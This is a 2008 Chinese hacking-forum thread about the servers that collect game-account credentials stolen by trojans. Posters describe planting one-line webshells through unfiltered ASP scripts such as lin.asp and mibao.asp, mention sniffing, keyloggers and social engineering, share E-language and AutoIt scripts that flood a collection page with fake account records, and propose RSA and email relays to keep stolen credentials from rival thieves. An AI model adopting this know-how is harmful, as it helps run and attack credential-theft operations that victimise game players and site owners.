额,我也忘记了,HOHO。。。。遗憾大话BOSS跑得快了。。 那个服务器上有伯乐的收信程序?我靠。我直接不知道。。。。~
肯定是另外一个盘里的程序,有个盘里我记得放了N多个收信程序。具体是什么程序我到没看过。
伯乐的ASP程序我没看过代码。到是大小姐和大少爷的我看过,只要数据库是ASP或者ASA的。就可以写进一句话
去。也可以跑数据库里的东西。:sad: 过滤字符才是王道......
.............
永远不会被黑?不见得吧
只要中了马就可以抓到你的收信地址, 有了收信地址可以做很多事了
貌似 伯乐 天下马 lin.asp 或者post.asp 都没做什么处理
伯乐马以前可以通过mibao.asp写入一句话,现在好象做了防下载处理, 不过lin.asp还是没过滤什么,只是限制了字符的长度, 其他的没注意,好象都差不多 还是把东西发到公共的邮箱好一点.把信息用公开的加密算法加密.只有你自已可以解密.然后利用google的记事本共享出来也一样. 就算那些像163的管理员看得见,也是一堆乱码,如果打数据写到图片当中就更好了.JPG到处可以公开.而且图像不能搜索. [quote]原帖由 [i]gs141575[/i] 于 2008-2-11 12:03 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=138299&ptid=32151][img]images/common/back.gif[/img][/url]
永远不会被黑?
不见得吧
只要中了马就可以抓到你的收信地址, 有了收信地址可以做很多事了
貌似 伯乐 天下马 lin.asp 或者post.asp 都没做什么处理
伯乐马以前可以通过mibao.asp写入一句话,现在好象做了防下载 ... [/quote]
如果我把数据库弄成mdb,你写一句话有P用? “本软件独创的远程提信技术”,全文除了这句比较恶心,其他的倒没什么,都是些过时玩意,没必要硬加“独创”、“原创”之类的字眼。这玩意说白了就是个C/S工具。
“一切用户密码都经过加密传输,避免黑客嗅探获取密码”,你说采用base64加密,仅仅是改变了一下算法,嗅探到依旧可以通过封包替换的方式进行登陆,某些游戏只有加密过的密码,还不是照样可以登陆。
再有就是这玩意受众群并不高,只适合大客户,大商人,有自己服务器的。
至于说到箱子被黑的问题,那是因为那些木马作者都忙着数钱,没时间帮客户搞安全。
要做到箱子不被黑,跟技术无关(因为他们完全有能力做到),关键在于是否够细心,考虑问题是否周到。
“新概念收信程序”,叫做“出信系统”跟适合,更能体现主题,“收信?”搞得有点不论不类。传闻天下已跑路,何不兼容下伯乐,呵呵。
还有就是楼主的帖子都带有这些垃圾游戏网站,貌似打算通过搜索引擎提高流量,再帮你的客户挂挂马哈,不好意思,猜测而已。 同意楼上的
箱子不被黑,跟技术无关 还是那句话:没有绝对安全的系统,说不定你现在在这里说安全就已经有人已经找到入侵方法在边看帖子边乐着笑你傻呢。
不过针对目前这些ASP写的箱子,10个有8个带漏洞,前些天我WOW号被盗了,现在想搞箱子去,弄死丫一群王八蛋。:mad: [quote]原帖由 [i]小明[/i] 于 2008-2-11 21:20 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=138321&ptid=32151][img]images/common/back.gif[/img][/url]
“本软件独创的远程提信技术”,全文除了这句比较恶心,其他的倒没什么,都是些过时玩意,没必要硬加“独创”、“原创”之类的字眼。这玩意说白了就是个C/S工具。
“一切用户密码都经过加密传输,避免黑客嗅探获取密码”,你说采 ... [/quote]
说,继续说,我很欣赏那些说白话的人。。。。给个实验证明吧。。。
[[i] 本帖最后由 asm 于 2008-2-12 20:00 编辑 [/i]] 原本打算写个小玩意让那些把无知当个性的人知道并非“一切用户密码都经过加密传输,避免黑客嗅探获取密码”。可惜你的玩意太高级,玩了半天没玩懂,在服务器上DOWN了你这套工具,运行服务端,还没添加帐号,然后在本机运行所谓“用户提信客户端.exe”,填入IP,随便输入个帐号 和密码,就提了5800多封你这套系统自带的测试信件,WHY?
首先声明本人手里可没什么真实大小姐 天下箱子,仅仅是为了测试而已,可惜你的这玩意不让俺顺心如意的测试,除了把登陆封包的固定的加密了一下,返回封包都是明文的。
可否先教教我如何使用?还是因为我操作不当,而导致信件直接全提了出来?大大请赐教。
别告诉我还要去搞1套什么大小姐的收信系统 然后再放到一块之类的。。。。
另外你那玩意到了指定日期后老是弹出你那随时都可能会带马的game8.cc,能不能先去掉下? 只要中了马就可以抓到你的收信地址, 有了收信地址可以做很多事了
貌似 伯乐 天下马 lin.asp 或者post.asp 都没做什么处理
不明白有了收信地址都可以做些什么事?
向数据库里写一句话,你知道数据库的地址是什么呀? 伯乐的ASP程序我没看过代码。到是大小姐和大少爷的我看过,只要数据库是ASP或者ASA的。就可以写进一句话
去。也可以跑数据库里的东西。 过滤字符才是王道......
还有个问题忘了问,知道收信地址,怎么能跑数据库里的东西? ASM的思路真的不错.我以前做游戏的时候弄过一个信封的转存系统,传输方式和转存方式我想有很多种.我这简单的说一下思路,做游戏的朋友可以考虑一下! 我还是感觉有漏洞怎么
貌似社会工程学更好点 虽然费时间
键盘记录也能拿到的 [quote]原帖由 [i]asm[/i] 于 2008-2-5 01:56 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=138027&ptid=32151][img]images/common/back.gif[/img][/url]
要搞人家箱子,有五点
一,脚本,你要注射?你压根不知道asp的文件名字,程序根本没有后台,你注射毛线?
二,服务器漏洞,除非你有远程E出。
三,社工,这个就看管理员的意识。
四,sinffer。这个收信程序是没有后台,单对程序来讲,你sinffer ... [/quote]
看了以上手段,我还真没想出来用什么来逆。。。可能我智商太低了 据说天下无马的后门大大的,不知道他的后门是在exe中还是在asp收信程序中呢? 如果没经过修改的收信页面都存在一个很大的缺陷!"刷信"!
小弟用易写的刷信的源代码
.版本 2
.支持库 HtmlView
.程序集 窗口程序集1
.子程序 __启动窗口_创建完毕
.子程序 _按钮1_被单击
超文本浏览框1.地址 = 编辑框8.内容 + “?a=” + 编辑框1.内容 + “&s=” + 编辑框2.内容 + “&u=” + 编辑框3.内容 + “&p=” + 编辑框4.内容 + “&r=” + 编辑框5.内容 + “&l=” + 编辑框6.内容 + “&m=” + 编辑框7.内容
只是个例子 这是叫朋友帮写的AU3的刷信
#include <GUIConstants.au3>
#include <IE.au3>
While 1
_IEErrorHandlerRegister ()
$oIE = _IECreateEmbedded ()
GUICreate("Embedded Web control Test", 640, 580, _
(@DesktopWidth - 640) / 2, (@DesktopHeight - 580) / 2, _
$WS_OVERLAPPEDWINDOW + $WS_VISIBLE + $WS_CLIPSIBLINGS)
$GUIActiveX = GUICtrlCreateObj($oIE, 10, 40, 600, 360)
$GUI_Button_Home = GUICtrlCreateButton("Home", 230, 420, 100, 30)
Dim $dq,$fw,$zh,$pw,$js,$le,$mon
$var = IniReadSection(@ScriptDir&"\sss.ini", "setup")
$dq = $var[Random(1,3)][0]
$fws = IniRead(@ScriptDir&"\sss.ini", "setup", $dq, "")
$fws = StringSplit($fws, ",")
$fw = $fws[Random(1, $fws[0])]
$zh = Chr(Random(65, 90))
$zh = $zh &Chr(Random(65, 90))
$zh = $zh &Chr(Random(65, 90))
$zh = $zh&Random(1, 9, 1)&Random(1, 9, 1)&Random(1, 9, 1)&Random(1, 9, 1)&Random(1, 9, 1)&Random(1, 9, 1)&Random(1, 9, 1)&Random(1, 9, 1)&Random(1, 9, 1)
$pw = "addfasd"
$js = "safdsfasd"
$le = "50"
$mon = "56554"
GUISetState()
_IENavigate($oIE, "http://www.XXX.cn/lin.asp?a="&$dq&"&s="&$fw&"&u="&$zh&"&p="&$pw&"&r="&$js&"&l="&$le&"&m="&$mon, 0)
For $i = 1 to 10
Sleep(1)
Next
GUIDelete()
WEnd - - 给LZ两图 04 05年的东西了..台湾天堂1木马的收信机~~
[img]http://hiphotos.baidu.com/skrceo/pic/item/86a890eed586b8ebb3fb9559.jpg[/img]
[img]http://hiphotos.baidu.com/skrceo/pic/item/163ff3f32b3a0440342acc6a.jpg[/img] 不被黑的最好办法是三次转发再加上RSA传输加密.:lol: 提交用RSA加密, 传输过程用E-mail传输
接受方自己写个MAIL服务器, 自动提取e-mail, 私钥解密, 用客户公钥加密, 存入客户邮箱
客户收信用E-mail收信
箱子完全加密, 除非修改主控端的解密加密, 否则就是安装者都不能获得箱子, 箱子可以保障唯一性
入侵者只能给自己添加帐号, 这不是太容易被管理员发现了么, 嘿嘿, 任何已存信封都无法获得, 哈哈 楼上的方法貌似更安全:lol:
页:
[1]